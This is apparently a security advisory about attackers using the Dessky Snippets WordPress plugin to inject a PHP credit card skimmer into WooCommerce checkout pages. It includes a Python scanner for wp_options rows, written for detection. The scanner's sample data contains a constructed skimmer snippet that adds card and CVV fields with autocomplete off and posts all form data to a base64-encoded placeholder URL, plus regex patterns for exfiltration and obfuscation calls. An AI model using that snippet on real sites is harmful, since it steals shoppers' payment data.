May 28, 2024
Severity
High
Analysis Summary
Lesser-known code snippet plugins for WordPress are being abused by unknown threat actors to inject malicious PHP code that harvests credit card data from victim websites.
Researchers discovered the campaign on May 11, 2024. It abuses Dessky Snippets, a WordPress plugin that lets site owners add custom PHP code and has more than 200 active installations.
Attacks of this kind typically obtain administrator access through known vulnerabilities in WordPress plugins or through weak, readily guessable credentials, and then install additional plugins, legitimate or not, for post-exploitation purposes. In this campaign, according to researchers, the Dessky Snippets plugin is used to plant a server-side PHP credit card skimmer on the compromised site.
The malicious code, stored in the dnsp_settings option of the WordPress wp_options table, modifies the WooCommerce checkout process by tampering with the billing form and injecting its own code. Specifically, it adds several fields to the billing form that solicit payment details: name, address, credit card number, expiration date and Card Verification Value (CVV). Whatever the customer enters is then exfiltrated to the attacker.
A notable detail of the campaign is that autocomplete is disabled on the billing form carrying the fraudulent overlay. Besides keeping the fields blank until the customer fills them in manually, disabling autocomplete on the fake checkout form lowers the chance that the browser will warn the user that sensitive information is being entered. This reduces suspicion and makes the injected fields look like ordinary, required inputs for the transaction.
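The following Python script is an added example, not code from the advisory or from the Dessky Snippets plugin. It scans rows exported from wp_options (for example via WP-CLI or a database dump) for stored PHP that shows the behaviours described above: hooking the WooCommerce checkout, adding card-data fields, switching autocomplete off, and calling out to an external host. The sample rows, every option name other than dnsp_settings, and the list of WooCommerce hook names are assumptions; the advisory does not say which hook the skimmer used or name other affected options.

```python
"""Scan exported wp_options rows for snippet-stored PHP that behaves like a
WooCommerce checkout skimmer.  Added example; not the advisory's own code."""
import re
from dataclasses import dataclass, field

# Indicators grouped by the behaviour the advisory describes.  The hook names
# are standard WooCommerce filters/actions; which one the Dessky skimmer used
# is not stated in the advisory, so this list is an assumption.
INDICATORS = {
    "checkout_hook": re.compile(
        r"woocommerce_(?:checkout_fields|after_checkout_billing_form|"
        r"checkout_process|checkout_order_processed)"),
    "card_fields": re.compile(
        r"card[_\s-]?number|ccnum|\bcvv\b|\bcvc\b|"
        r"exp(?:iry|iration)[_\s-]?(?:date|month|year)", re.I),
    # Matches both the HTML attribute form autocomplete="off" (possibly with
    # escaped quotes inside a PHP string) and the array form 'autocomplete' => 'off'.
    "autocomplete_off": re.compile(
        r"autocomplete[\"']?\s*=>?\s*\\?[\"']?off", re.I),
    "exfil": re.compile(
        r"\b(?:curl_init|curl_exec|wp_remote_post|file_get_contents|mail)\s*\("),
    "obfuscation": re.compile(
        r"\b(?:base64_decode|gzinflate|str_rot13|eval)\s*\("),
}

# Options that code snippet plugins write PHP into.  dnsp_settings is the one
# named in the advisory (Dessky Snippets).
SNIPPET_OPTIONS = {"dnsp_settings"}


@dataclass
class Finding:
    option: str
    categories: list = field(default_factory=list)
    verdict: str = "clean"


def classify(option_name: str, value: str) -> Finding:
    """Classify one option value.  Serialized PHP arrays are scanned as raw
    text, which is sufficient for these string indicators."""
    finding = Finding(option_name)
    finding.categories = [name for name, rx in INDICATORS.items() if rx.search(value)]
    hits = set(finding.categories)
    # Skimmer: solicits card data on the checkout form AND sends it somewhere.
    if {"card_fields", "checkout_hook"} <= hits and "exfil" in hits:
        finding.verdict = "skimmer"
    # Anything with two indicator classes, or any indicator at all inside a
    # snippet plugin's option, deserves a manual look.
    elif len(hits) >= 2 or (option_name in SNIPPET_OPTIONS and hits):
        finding.verdict = "suspicious"
    return finding


def scan_options(rows):
    """rows: iterable of (option_name, option_value) pairs from wp_options."""
    return {name: classify(name, value) for name, value in rows}


# Constructed sample rows.  The malicious snippet mimics the behaviour the
# advisory describes; the URL decodes to https://example.invalid/collect.
MALICIOUS_SNIPPET = r'''
add_filter("woocommerce_checkout_fields", function($fields) {
    $fields["billing"]["billing_card_number"] = array("label" => "Card number",
        "custom_attributes" => array("autocomplete" => "off"), "required" => true);
    $fields["billing"]["billing_cvv"] = array("label" => "CVV",
        "custom_attributes" => array("autocomplete" => "off"), "required" => true);
    return $fields;
});
add_action("woocommerce_checkout_process", function() {
    $ch = curl_init(base64_decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvY29sbGVjdA=="));
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($_POST));
    curl_exec($ch);
});
'''
# A legitimate checkout customisation (extra VAT field) must not be flagged.
LEGIT_CHECKOUT_SNIPPET = r'''
add_filter("woocommerce_checkout_fields", function($f) {
    $f["billing"]["billing_vat"] = array("label" => "VAT number");
    return $f;
});
'''
SAMPLE_ROWS = [
    ("siteurl", "https://shop.example"),
    ("custom_footer_snippet", 'add_action("wp_footer", function() { echo "<!-- v2 -->"; });'),
    ("shop_checkout_customizations", LEGIT_CHECKOUT_SNIPPET),
    ("dnsp_settings", MALICIOUS_SNIPPET),
]

if __name__ == "__main__":
    for name, finding in scan_options(SAMPLE_ROWS).items():
        print(f"{name:32} {finding.verdict:10} {', '.join(finding.categories)}")
```

In a live investigation, feed the script the output of `wp option list --format=json` or a dump of the wp_options table rather than the constructed rows, and treat a "skimmer" verdict as confirmation only after reading the snippet itself; the legitimate VAT-field snippet shows why a single checkout hook on its own is not enough to flag.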
This is not the first time legitimate code snippet plugins have been turned to malicious ends. Last month, researchers found malicious JavaScript being injected into WordPress websites through the WPCode snippet plugin to redirect visitors to VexTrio domains. A separate campaign known as Sign1 has affected more than 39,000 WordPress websites, using the Simple Custom CSS and JS plugin to inject JavaScript that diverts visitors to fraudulent sites.
Owners of WordPress websites, especially those with e-commerce features, are advised to check their sites regularly for malware and unauthorized changes, use strong passwords to thwart brute-force attacks, and keep WordPress core and plugins up to date.
Impact
- Financial Loss
- Sensitive Data Theft
- Code Execution
Remediation
- Enhance the security of your WordPress site by implementing two-factor authentication.
- Keep your WordPress core and all installed plugins up to date.
- Conduct regular security audits of your WordPress site.
- Enable antivirus and anti-malware software and update signature definitions promptly. Use multi-layered protection to secure vulnerable assets.
- Maintain daily backups of all computer networks and servers.
- Keep all software, operating systems, and applications updated with the latest security patches.
- Continuously monitor network and system logs for unusual or suspicious activities.
- Review and secure website code to prevent open redirect vulnerabilities.
- Educate all site administrators about security best practices and the potential risks associated with phishing emails, fake security advisories, and malicious plugins.